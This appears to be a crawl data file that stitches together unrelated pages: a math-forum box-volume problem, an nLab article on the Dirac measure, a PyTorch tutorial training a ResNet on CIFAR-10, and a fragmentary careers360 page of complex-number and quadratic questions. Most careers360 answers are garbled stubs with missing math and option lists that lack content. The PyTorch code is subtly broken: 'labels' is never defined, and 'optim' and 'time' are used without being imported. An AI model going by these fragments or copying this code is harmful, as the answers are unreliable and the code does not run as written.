The restricted AR(1) model is not rejected in favor of the AR(2) model (`h = 0`). | 2019-09-20 03:25:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 10, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9626597762107849, "perplexity": 1080.7310305462322}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573827.2/warc/CC-MAIN-20190920030357-20190920052357-00347.warc.gz"} |
http://mathhelpforum.com/calculus/151661-optimization-problem.html | # Math Help - Optimization problem
1. ## Optimization problem
Three large squares of tin, each with edges 1m long, have four small, equal squares cut from their corners. All twelve resulting small squares are to be of the same size. The three large cross-shaped pieces are then folded and welded to make boxes with no tops, and the twelve small squares are used to make two small cubes. How should this be done to maximize the total volume of all five boxes?
------------------------------------------------------------
My working:
$V=2x^3+3(1-2x)^2x$
$V=2x^3+3(1+4x^2-4x)x$
$V=2x^3+3x+12x^3-12x^2$
$V=14x^3-12x^2+3x$
$\frac{dV}{dx}=0$ for maxima.
$42x^2-24x+3=0$
$14x^2-8x+1=0$
$x=0.3867$ or $x=0.1846$
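As a quick numerical check of these stationary points against the endpoint $x=0.5$ of the feasible range (cutting four corner squares of side $x$ from a 1 m sheet needs $2x\leq 1$), evaluating $V=2x^3+3x(1-2x)^2$ gives

$V(0.1846)\approx 0.233,\qquad V(0.3867)\approx 0.175,\qquad V(0.5)=2(0.5)^3=0.25$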
------------------------------------------------------------
However, the answer given in the book is:
$0.25 m^3$ (all cubes, no open topped boxes) | 2015-11-29 01:02:07 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 10, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5124813318252563, "perplexity": 1980.3438288319912}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398454553.89/warc/CC-MAIN-20151124205414-00161-ip-10-71-132-137.ec2.internal.warc.gz"} |
https://ncatlab.org/nlab/show/Dirac+measure | # nLab Dirac measure
# Contents
## Idea
A Dirac measure is a measure whose (unit) mass is concentrated on a single point $x$ of a space $X$.
From the point of view of probability theory, a Dirac measure can be seen as the law of a deterministic random variable, or more generally one which is almost surely equal to a point $x$.
See also Dirac distribution for the analogous concept in the language of distributions.
## Definition
### For measurable spaces
Let $X$ be a measurable space. Given $x\in X$, the Dirac measure $\delta_x$ at $x$ is the measure defined by
$\delta_x(A) \;\coloneqq\; \begin{cases} 1 & x\in A \\ 0 & x\notin A \end{cases}$
for each measurable set $A\subseteq X$.
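For instance, on $X = \mathbb{R}$ with its Borel $\sigma$-algebra, the Dirac measure at $0$ satisfies

$\delta_0([-1,1]) = 1, \qquad \delta_0((2,3)) = 0, \qquad \int_X f \, d\delta_0 = f(0)$

for every measurable $f\colon X\to\mathbb{R}$, so integration against $\delta_0$ is simply evaluation at $0$.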
### For topological spaces
If $X$ is a topological space, the Dirac measure at $x$ can be also defined as the unique Borel measure $\delta_x$ which satisfies
$\delta_x(U) \;\coloneqq\; \begin{cases} 1 & x\in U \\ 0 & x\notin U \end{cases}$
for each open set $U\subseteq X$.
Equivalently, it is the extension to a measure of the Dirac valuations.
(…)
## Properties
• Every Dirac valuation on a topological space can be extended to a Dirac measure.
• On a topological space $X$, the support of the Dirac measure at $x\in X$ is equal to the closure of $x$. On T1 spaces, this is just the singleton $\{x\}$.
• The pushforward measure of a Dirac measure along a measurable function is again a Dirac measure. This is related to naturality of the unit map of probability and measure monads.
• Given a Dirac measure $\delta_x$ on a measurable space $X$ and any measure $\mu$ on any measurable space $Y$, the product measure $\delta_x\otimes \mu$ is the unique coupling of $\delta_x$ and $\mu$.
• The coupling above defines a map $X\times P Y\to P(X\times Y)$ which gives the strength of most probability and measure monads.
## Significance
• The Dirac measures (and the Dirac valuations) give the unit of all probability and measure monads.
• The probabilistic interpretation is that the Dirac measures are exactly those of deterministic elements (or almost deterministic), i.e. which are “not truly random”.
• In terms of random variables, and somewhat conversely, a random element? of $X$ has the Dirac measure $\delta_x$ as law? if and only if it is almost surely? equal to $x$. | 2020-06-01 16:25:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 29, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9665538668632507, "perplexity": 332.10288903908315}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347419056.73/warc/CC-MAIN-20200601145025-20200601175025-00388.warc.gz"} |
https://blog.paperspace.com/pytorch-101-building-neural-networks/ | # PyTorch 101, Part 2: Building Your First Neural Network
In this part, we will implement a neural network to classify CIFAR-10 images. We cover implementing the neural network, data loading pipeline and a decaying learning rate schedule.
2 years ago • 13 min read
In this article, we will discuss how to use PyTorch to build custom neural network architectures, and how to configure your training loop. We will implement a ResNet to classify images from the CIFAR-10 Dataset.
Before, we begin, let me say that the purpose of this tutorial is not to achieve the best possible accuracy on the task, but to show you how to use PyTorch.
Let me also remind you that this is the Part 2 of the our tutorial series on PyTorch. Reading the first part, though not necessary for this article, is highly recommended.
You can get all the code in this post, (and other posts as well) in the Github repo here.
In this post, we will cover
1. How to build neural networks using nn.Module class
2. How to build custom data input pipelines with data augmentation using Dataset and Dataloader classes.
3. How to configure your learning rate with different learning rate schedules
4. Training a ResNet-based image classifier to classify images from the CIFAR-10 dataset.
## Prerequisites
1. Chain rule
2. Basic Understanding of Deep Learning
3. PyTorch 1.0
4. Part 1 of this tutorial
You can get all the code in this post, (and other posts as well) in the Github repo here.
## A Simple Neural Network
In this tutorial, we will be implementing a very simple neural network.
## Building the Network
The torch.nn module is the cornerstone of designing neural networks in PyTorch. Its nn.Module class can be used to implement a layer like a fully connected layer, a convolutional layer, a pooling layer, an activation function, and also an entire neural network, by subclassing torch.nn.Module. (From now on, I'll refer to it as merely nn.Module)
Multiple nn.Module objects can be strung together to form a bigger nn.Module object, which is how we can implement a neural network using many layers. In fact, nn.Module can be used to represent an arbitrary function f in PyTorch.
The nn.Module class has two methods that you have to override.
1. __init__ function. This function is invoked when you create an instance of the nn.Module. Here you will define the various parameters of a layer such as filters, kernel size for a convolutional layer, dropout probability for the dropout layer.
2. forward function. This is where you define how your output is computed. This function doesn't need to be explicitly called, and can be run by just calling the nn.Module instance like a function with the input as its argument.
import torch
import torch.nn as nn

# Very simple layer that just multiplies the input by a number
class MyLayer(nn.Module):
    def __init__(self, param):
        super().__init__()
        self.param = param

    def forward(self, x):
        return x * self.param

myLayerObject = MyLayer(5)
output = myLayerObject(torch.Tensor([5, 4, 3]))   # calling forward implicitly
print(output)
Another widely used and important class is the nn.Sequential class. When instantiating this class we can pass a list of nn.Module objects in a particular sequence. The object returned by nn.Sequential is itself a nn.Module object. When this object is run with an input, it sequentially runs the input through all the nn.Module objects we passed to it, in the very same order as we passed them.
combinedNetwork = nn.Sequential(MyLayer(5), MyLayer(10))
output = combinedNetwork(torch.Tensor([3, 4]))
# equivalent to..
# out = MyLayer(5)(torch.Tensor([3, 4]))
# out = MyLayer(10)(out)
Let us now start implementing our classification network. We will make use of convolutional and pooling layers, as well as a custom implemented residual block.
While PyTorch provides many layers out of the box with its torch.nn module, we will have to implement the residual block ourselves. Before implementing the neural network, we implement the ResNet block.
class ResidualBlock(nn.Module):
    def __init__(self, in_channels, out_channels, stride=1):
        super(ResidualBlock, self).__init__()

        # Conv Layer 1
        self.conv1 = nn.Conv2d(
            in_channels=in_channels, out_channels=out_channels,
            kernel_size=(3, 3), stride=stride, padding=1, bias=False
        )
        self.bn1 = nn.BatchNorm2d(out_channels)

        # Conv Layer 2
        self.conv2 = nn.Conv2d(
            in_channels=out_channels, out_channels=out_channels,
            kernel_size=(3, 3), stride=1, padding=1, bias=False
        )
        self.bn2 = nn.BatchNorm2d(out_channels)

        # Shortcut connection to downsample residual
        # In case the output dimensions of the residual block are not the same
        # as its input, have a convolutional layer downsample the tensor
        # being brought forward by appropriate striding and filters
        self.shortcut = nn.Sequential()
        if stride != 1 or in_channels != out_channels:
            self.shortcut = nn.Sequential(
                nn.Conv2d(
                    in_channels=in_channels, out_channels=out_channels,
                    kernel_size=(1, 1), stride=stride, bias=False
                ),
                nn.BatchNorm2d(out_channels)
            )

    def forward(self, x):
        out = nn.ReLU()(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out += self.shortcut(x)
        out = nn.ReLU()(out)
        return out
As you see, we define the layers, or the components of our network, in the __init__ function. In the forward function, we define how these components are strung together to compute the output from our input.
Now, we can define our full network.
class ResNet(nn.Module):
    def __init__(self, num_classes=10):
        super(ResNet, self).__init__()

        # Initial input conv
        self.conv1 = nn.Conv2d(
            in_channels=3, out_channels=64, kernel_size=(3, 3),
            stride=1, padding=1, bias=False
        )
        self.bn1 = nn.BatchNorm2d(64)

        # Create blocks
        self.block1 = self._create_block(64, 64, stride=1)
        self.block2 = self._create_block(64, 128, stride=2)
        self.block3 = self._create_block(128, 256, stride=2)
        self.block4 = self._create_block(256, 512, stride=2)
        self.linear = nn.Linear(512, num_classes)

    # A block is just two residual blocks for ResNet18
    def _create_block(self, in_channels, out_channels, stride):
        return nn.Sequential(
            ResidualBlock(in_channels, out_channels, stride),
            ResidualBlock(out_channels, out_channels, 1)
        )

    def forward(self, x):
        # Output of one layer becomes input to the next
        out = nn.ReLU()(self.bn1(self.conv1(x)))
        out = self.block1(out)
        out = self.block2(out)
        out = self.block3(out)
        out = self.block4(out)
        out = nn.AvgPool2d(4)(out)
        out = out.view(out.size(0), -1)
        out = self.linear(out)
        return out
## Input Format
Now that we have our network object, we turn our focus to the input. We come across different types of input while working with Deep Learning. Images, audio or high dimensional structural data.
The kind of data we are dealing with will dictate what input we use. Generally, in PyTorch, you will realise that batch is always the first dimension. Since we are dealing with Images here, I will describe the input format required by images.
The input format for images is [B C H W]. Where B is the batch size, C are the channels, H is the height and W is the width.
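As a quick sanity check, here is a minimal sketch that feeds a random batch in this format through the ResNet defined above (the batch size of 16 is arbitrary):

```python
import torch

net = ResNet(num_classes=10)
dummy_batch = torch.randn(16, 3, 32, 32)   # [B C H W]: 16 CIFAR-sized RGB images
out = net(dummy_batch)
print(out.shape)                           # torch.Size([16, 10]): one score per class
```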
The output of our neural network is gibberish right now since we have used random weights. Let us now train our network.
Let us now load the data. We will be making the use of torch.utils.data.Dataset and torch.utils.data.Dataloader class for this.
Fire up the terminal, cd to your code directory and run the following commands.
wget http://pjreddie.com/media/files/cifar.tgz
tar xzf cifar.tgz
You might need to use curl if you're on macOS or manually download it if you're on windows.
We now read the labels of the classes present in the CIFAR dataset.
data_dir = "cifar/train/"
with open("cifar/labels.txt") as label_file:
label_mapping = dict(zip(labels, list(range(len(labels)))))
We will be reading images using PIL library. Before we write the functionality to load our data, we write a preprocessing function that does the following things.
1. Randomly flip the image horizontally with a probability of 0.5
2. Normalise the image with mean and standard deviation of CIFAR dataset
3. Reshape it from H W C to C H W.
import random
import numpy as np

def preprocess(image):
    image = np.array(image)                   # PIL image -> H x W x C array
    image = image.astype(np.float32) / 255.0  # scale to [0, 1] so the CIFAR stats below apply
    # Random horizontal flip with probability 0.5
    if random.random() > 0.5:
        image = image[:, ::-1, :]
    # Normalise with the CIFAR mean and standard deviation
    cifar_mean = np.array([0.4914, 0.4822, 0.4465]).reshape(1, 1, -1)
    cifar_std = np.array([0.2023, 0.1994, 0.2010]).reshape(1, 1, -1)
    image = (image - cifar_mean) / cifar_std
    # Reshape from H x W x C to C x H x W
    image = image.transpose(2, 0, 1)
    return image
Normally, there are two classes PyTorch provides you for building input pipelines to load data.
1. torch.utils.data.Dataset, which we will just refer to as the Dataset class from now on.
2. torch.utils.data.DataLoader, which we will just refer to as the Dataloader class from now on.
### torch.utils.data.dataset
dataset is a class that loads the data and returns a generator so that you iterate over it. It also lets you incorporate data augmentation techniques into the input Pipeline.
If you want to create a dataset object for your data, you need to overload three functions.
1. __init__ function. Here, you define things related to your dataset, most importantly the location of your data. You can also define various data augmentations you want to apply.
2. __len__ function. Here, you just return the length of the dataset.
3. __getitem__ function. The function takes as an argument an index i and returns a data example. This function would be called every iteration during our training loop with a different i by the dataset object.
Here is an implementation of our dataset object for the CIFAR dataset.
import os
import random
from PIL import Image

class Cifar10Dataset(torch.utils.data.Dataset):
    def __init__(self, data_dir, data_size = 0, transforms = None):
        files = os.listdir(data_dir)
        files = [os.path.join(data_dir, x) for x in files]
        if data_size < 0 or data_size > len(files):
            raise ValueError("Data size should be between 0 and the number of files in the dataset")
        if data_size == 0:
            data_size = len(files)
        self.data_size = data_size
        self.files = random.sample(files, self.data_size)
        self.transforms = transforms

    def __len__(self):
        return self.data_size

    def __getitem__(self, idx):
        image_address = self.files[idx]
        image = Image.open(image_address)
        image = preprocess(image)
        # the label is encoded in the file name, e.g. "0_frog.png"
        label_name = image_address[:-4].split("_")[-1]
        label = label_mapping[label_name]
        image = image.astype(np.float32)
        if self.transforms:
            image = self.transforms(image)
        return image, label
We also use the __getitem__ function to extract the label for an image encoded in its file name.
Dataset class allows us to incorporate the lazy data loading principle. This means instead of loading all data at once into the memory (which could be done by loading all the images in memory in the __init__ function rather than just addresses), it only loads a data example whenever it is needed (when __getitem__ is called).
When you create an object of the Dataset class, you can basically iterate over the object as you would over any python iterable. Each iteration, __getitem__ is called with the incremented index i as its input argument.
### Data Augmentations
I've passed a transforms argument in the __init__ function as well. This can be any python function that does data augmentation. While you can do the data augmentation right inside your preprocess code, doing it inside the __getitem__ is just a matter of taste.
Here, we can also add data augmentation. These data augmentations can be implemented as either functions or classes. You just have to make sure that you are able to apply them to your desired outcome in the __getitem__ function.
We have a plethora of data augmentation libraries that can be used to augment data.
For our case, torchvision library provides a lot of pre-built transforms along with the ability to compose them into one bigger transform. But we are going to keep our discussion limited to PyTorch here.
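As a small illustration, an augmentation can be any callable that takes the preprocessed C x H x W float array and returns a modified one; a minimal sketch (the class name and noise level are arbitrary) is a transform that adds a little Gaussian noise:

```python
import numpy as np

class AddGaussianNoise:
    """Callable augmentation: adds zero-mean Gaussian noise to a C x H x W float32 array."""
    def __init__(self, std=0.05):
        self.std = std

    def __call__(self, image):
        return image + np.random.randn(*image.shape).astype(np.float32) * self.std

# Passed to the dataset exactly like any other transform
augmented_trainset = Cifar10Dataset(data_dir="cifar/train/", transforms=AddGaussianNoise(0.05))
```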
The Dataloader class facilitates
1. Batching of Data
2. Shuffling of Data
3. Loading of data in parallel using multiple worker processes (the num_workers argument)
4. Prefetching, that is, while the GPU crunches the current batch, Dataloader can load the next batch into memory in the meantime. This means the GPU doesn't have to wait for the next batch and it speeds up training.
You instantiate a Dataloader object with a Dataset object. Then you can iterate over a Dataloader object instance just like you did with a dataset instance.
However you can specify various options that can let you have more control on the looping options.
trainset = Cifar10Dataset(data_dir = "cifar/train/", transforms=None)
testset = Cifar10Dataset(data_dir = "cifar/test/", transforms=None)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=128, shuffle=True, num_workers=2)
testloader = torch.utils.data.DataLoader(testset, batch_size=128, shuffle=True, num_workers=2)
Both the trainset and trainloader objects are python generator objects which can be iterated over in the following fashion.
for data in trainloader: # or trainset
    img, label = data
However, the Dataloader class makes things much more convenient than Dataset class. While on each iteration the Dataset class would only return us the output of the __getitem__ function, Dataloader does much more than that.
1. Notice that our __getitem__ method of trainset returns a numpy array of shape 3 x 32 x 32. Dataloader batches the images into a Tensor of shape 128 x 3 x 32 x 32 (since batch_size = 128 in our code).
2. Also notice that while our __getitem__ method outputs a numpy array, Dataloader class automatically converts it into a Tensor
3. Even if the __getitem__ method returns an object which is of non-numerical type, the Dataloader class turns it into a list / tuple of size B (128 in our case). Suppose that __getitem__ also returns a string, namely the label string. If we set batch = 128 while instantiating the dataloader, each iteration, Dataloader will give us a tuple of 128 strings.
Add prefetching and multi-worker loading to the above benefits, and using the Dataloader class is preferred almost every time.
## Training and Evaluation
Before we start writing our training loop, we need to decide our hyperparameters and our optimisation algorithms. PyTorch provides us with many pre-built optimisation algorithms through its torch.optim module.
### torch.optim
torch.optim module provides you with multiple functionalities associated with training / optimisation like.
1. Different optimisation algorithms (like optim.SGD, optim.Adam)
2. Ability to schedule the learning rate (with optim.lr_scheduler)
3. Ability to having different learning rates for different parameters (we will not discuss this in this post though).
We use a cross entropy loss, with momentum based SGD optimisation algorithm. Our learning rate is decayed by a factor of 0.1 at 150th and 200th epoch.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") #Check whether a GPU is present.
clf = ResNet()
clf.to(device) #Put the network on GPU if present
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(clf.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[150, 200], gamma=0.1)
In the first line of code, device is set to cuda:0 if GPU number 0 is present, and to cpu if not.
By default, when we initialise a network, it resides on the CPU. clf.to(device) moves the network to GPU if present. We will cover how to use multiple GPUs in more detail in another part. We can alternatively use clf.cuda(0) to move our network clf to GPU 0. (Replace 0 by the index of the GPU in the general case.)
criterion is an nn.CrossEntropyLoss object which, as the name suggests, implements the cross entropy loss. It subclasses nn.Module.
We then define the variable optimizer as an optim.SGD object. The first argument to optim.SGD is clf.parameters(). The parameters() function of a nn.Module object returns it's so called parameters (Implemented as nn.Parameter objects, we will learn about this class in a next part where we explore advanced PyTorch functionality. For now, think of it as a list of associated Tensors which are learnable). clf.parameters() are basically the weights of our neural network.
As you will see in the code, we will call step() function on optimizer in our code. When step() is called, the optimizer updates each of the Tensor in clf.parameters() using the gradient update rule equation. The gradients are accessed by using the grad attribute of each Tensor
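Conceptually, ignoring momentum and weight decay, the update that optimizer.step() performs is just the plain gradient descent rule applied to every parameter; a minimal hand-rolled sketch of the same idea looks like this:

```python
# What a plain SGD step does under the hood (momentum / weight decay omitted)
learning_rate = 0.1
with torch.no_grad():
    for param in clf.parameters():
        if param.grad is not None:
            param -= learning_rate * param.grad
```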
Generally, the first argument to any optimiser whether it be SGD, Adam or RMSprop is the list of Tensors it is supposed to update. The rest of arguments define the various hyperparameters.
scheduler, as the name suggests, can schedule various hyperparameters of the optimizer. optimizer is used to instantiate scheduler. It updates the hyperparameters every time we call scheduler.step()
### Writing the training loop
We finally train the network. The loop below runs for 10 epochs to keep the example short; you can increase the number of epochs (the scheduler milestones above assume a run of about 200). This might take a while on a GPU. Again, the idea of this tutorial is to show how PyTorch works and not to attain the best accuracy.
We evaluate classification accuracy every epoch.
for epoch in range(10):
    losses = []
    scheduler.step()

    # Train
    start = time.time()
    for batch_idx, (inputs, targets) in enumerate(trainloader):
        inputs, targets = inputs.to(device), targets.to(device)

        optimizer.zero_grad()                # Zero the gradients from the previous pass
        outputs = clf(inputs)                # Forward pass
        loss = criterion(outputs, targets)   # Compute the loss
        loss.backward()                      # Backward pass, compute the gradients
        optimizer.step()                     # Update the weights

        losses.append(loss.item())
        end = time.time()

        if batch_idx % 100 == 0:
            print('Batch Index : %d Loss : %.3f Time : %.3f seconds ' % (batch_idx, np.mean(losses), end - start))
            start = time.time()

    # Evaluate
    clf.eval()
    total = 0
    correct = 0
    with torch.no_grad():                    # no graph is built during evaluation
        for batch_idx, (inputs, targets) in enumerate(testloader):
            inputs, targets = inputs.to(device), targets.to(device)
            outputs = clf(inputs)
            _, predicted = torch.max(outputs.data, 1)
            total += targets.size(0)
            correct += predicted.eq(targets.data).cpu().sum()

    print('Epoch : %d Test Acc : %.3f' % (epoch, 100.*correct/total))
    print('--------------------------------------------------------------')
    clf.train()
Now, the above is a large chunk of code. I didn't break it into smaller ones so as to not risk continuity. While I've added comments in the code to inform the reader what's going on, I will now explain the not so trivial parts in the code.
We first call scheduler.step() at the beginning of each epoch to make sure that the optimizer uses the correct learning rate.
The first thing we do inside the loop is move our input and target to GPU 0. This should be the same device on which our model resides, otherwise PyTorch will throw an error and halt.
Notice we call optimizer.zero_grad() before our forward pass. This is because leaf Tensors (which the weights are) retain the gradients from previous passes. If backward is called again on the loss, the new gradients are simply added to the earlier gradients contained in the grad attribute. This functionality comes in handy when working with RNNs, but for now we need to set the gradients to zero so they don't accumulate between subsequent passes.
We also put our evaluation code inside torch.no_grad context, so that no graph is created for evaluation. If you find this confusing, you can go back to part 1 to refresh your autograd concepts.
Also notice, we call clf.eval() on our model before evaluation, and then clf.train() after it. A model in PyTorch has two states, eval() and train(). The difference between the states is rooted in stateful layers like Batch Norm (batch statistics in training vs population statistics in inference) and Dropout, which behave differently during inference and training. eval tells the nn.Module to put these layers in inference mode, while train tells the nn.Module to put them back in training mode.
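A minimal sketch of what this toggling looks like in practice (the training attribute is the flag these layers consult):

```python
clf.eval()
print(clf.training)   # False -> BatchNorm uses running statistics, Dropout is disabled
clf.train()
print(clf.training)   # True  -> back to training-time behaviour
```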
# Conclusion
This was an exhaustive tutorial where we showed you how to build a basic training classifier. While this is only a start, we have covered all the building blocks that can let you get started with developing deep networks with PyTorch.
In the next part of this series, we will look into some of the advanced functionality present in PyTorch that will supercharge your deep learning designs. These include ways to create even more complex architectures, how to customise training such as having different learning rates for different parameters. | 2021-09-21 18:01:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2726709544658661, "perplexity": 3019.151570108766}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057225.57/warc/CC-MAIN-20210921161350-20210921191350-00346.warc.gz"} |
https://learn.careers360.com/engineering/questions/jee_main-maths-complex_numbers_and_quadratic_equations/?page=2
If $z=\frac{\sqrt{3}}{2}+\frac{i}{2}\left ( i=\sqrt{-1} \right ),$ then $\left ( 1+iz+z^{5}+iz^{8} \right )^{9}$ is equal to :
• Option 1)
$0$
• Option 2)
$1$
• Option 3)
$\left ( -1+2i \right )^{9}$
• Option 4)
$-1$
(cube root of unity) Option 1) Option 2) Option 3) Option 4)
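One way to fill in the idea: write $z=\cos \frac{\pi }{6}+i\sin \frac{\pi }{6}=e^{i\pi /6}$, so that $iz=e^{i2\pi /3}$ is a primitive cube root of unity. Then
$1+iz+z^{5}+iz^{8}=1+e^{i2\pi /3}+e^{i5\pi /6}+e^{i11\pi /6}=\frac{1}{2}+\frac{i\sqrt{3}}{2}=e^{i\pi /3},$
and $\left ( e^{i\pi /3} \right )^{9}=e^{i3\pi }=-1$, which matches Option 4).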
If the fourth term of the binomial expansion $\left ( \sqrt{\frac{1}{x^{1+\log_{10}x}}}+x^{\frac{1}{12}} \right )^{6}$ is equal to $200,$ and $x>1$, then the value of x is :
• Option 1)
$100$
• Option 2)
$10$
• Option 3)
$10^{3}$
• Option 4)
$10^{4}$
Fourth term is given So, take log both side. put Option 1) Option 2) Option 3) Option 4)
If $\alpha \; and\; \beta$ be the roots of the equation $x^{2}-2x+2=0$, then the least value of n for which $\left ( \frac{\alpha }{\beta } \right )^{n}=1$ is :
• Option 1)
$2$
• Option 2)
$5$
• Option 3)
$4$
• Option 4)
$3$
So Option 1) Option 2) Option 3) Option 4)
The sum of the solutions of the equation $\left | \sqrt{x}-2 \right |+\sqrt{x}\left (\sqrt{x}-4 \right )+2=0,(x>0)$ is equal to :
• Option 1)
$12$
• Option 2)
$10$
• Option 3)
$9$
• Option 4)
$4$
Sum Option 1) Option 2) Option 3) Option 4)
Let Z = x +iy Hence z will lie on imaginary axis for every x
15519652398521476122459.jpg Solve it
The number of complex number z which satisfy z^2+2|z|^2=2
@mannika If you look at problem, , it is clear that must be real. if you solve you get so, if we represent
15519582136261468787462.jpg The number of complex number z such that |z-i|=|z+i|=|z+1| is
@mannika We are given that, |z-i| = |z- (-i)| = |z- (-1)| we know that in a complex plane, |z-a| represents distance of z from complex number a. Now we are given, 3 points (0,1);(0,-1);(-1,0) from which distance of z is equal.But we know in a plane there exist only 1 point which are equidistant from these 3 points which is centroid of triangle made by these 3 points.
I have not understood anything in the cube root of unity topic video.
$z^3 = 1$
$z^3-1=0 \Rightarrow (z-1)(z^2+z+1)=0$, so either $z-1=0$ or $z^2+z+1=0$, giving $z=1$ or $z=-\frac{1}{2}\pm\frac{i\sqrt{3}}{2}$. The cube roots of unity are therefore $1$, $-\frac{1}{2}+\frac{i\sqrt{3}}{2}$ and $-\frac{1}{2}-\frac{i\sqrt{3}}{2}$.
If the roots of the quadratic equation $x^2 + px + q = 0$ are tan30° and tan15°, respectively, then the value of 2 + q − p is
• Option 1)
2
• Option 2)
3
• Option 3)
0
• Option 4)
1
Option 1) 2 Option 2) 3 Option 3) 0 Option 4) 1
All the values of m for which both roots of the equation $x^2 − 2mx + m^2 − 1 = 0$ are greater than −2 but less than 4 lie in the interval
• Option 1)
−2 < m < 0
• Option 2)
m > 3
• Option 3)
−1 < m < 3
• Option 4)
1 < m < 4
Option 1) −2 < m < 0 Option 2) m > 3 Option 3) −1 < m < 3 Option 4) 1 < m < 4
IMG_20190109_35438.jpg Sum of roots of the equation (x + — 41x + 31+ 3 = O is -
@Arvind 1.
15470031512802109424855.jpg Number of negative integral value of x satisfying
@Vijay Q42
IMG_20190115_201103.jpg
The solution of the inequation $|x^2-2x-3|<|x^2-x+5|$ is:
15475677420921088009151.jpg $|f(x)|=|x^2-2x-3|$, $|g(x)|=|x^2-x+5|$, $|f(x)|<|g(x)|$; plot the graphs of f(x) and g(x)
Sir in |z-2+3i| how we get Centre as (2,3)
@Arvind
how do you get y is less than or equal to 2 from that (y-2)^2 =y (y-2)^2 is less than or equal to 2
@santhosh we are taking different cases (1) when y is less than or equal 2 (2) when 2<y less than or equal to 3 (3) y is greater than 3
Screenshot_718.png
Screenshot_719.png
Screenshot_716.png
santosh2.jpg for atleast one negative value of x (x-x_1)(x-x_2) is less than 0 and Discriminant is greater than 0
Screenshot_715.png
santosh.jpg put x-1=y^2 simplify use the concept that value under any square root is always greater then or equal to 0
rps20190122_174705.jpg
so the roots are $(x,y) = \left(\frac{1}{\sqrt{2}},-\frac{1}{\sqrt{2}}\right)$ or $\left(-\frac{1}{\sqrt{2}},\frac{1}{\sqrt{2}}\right)$
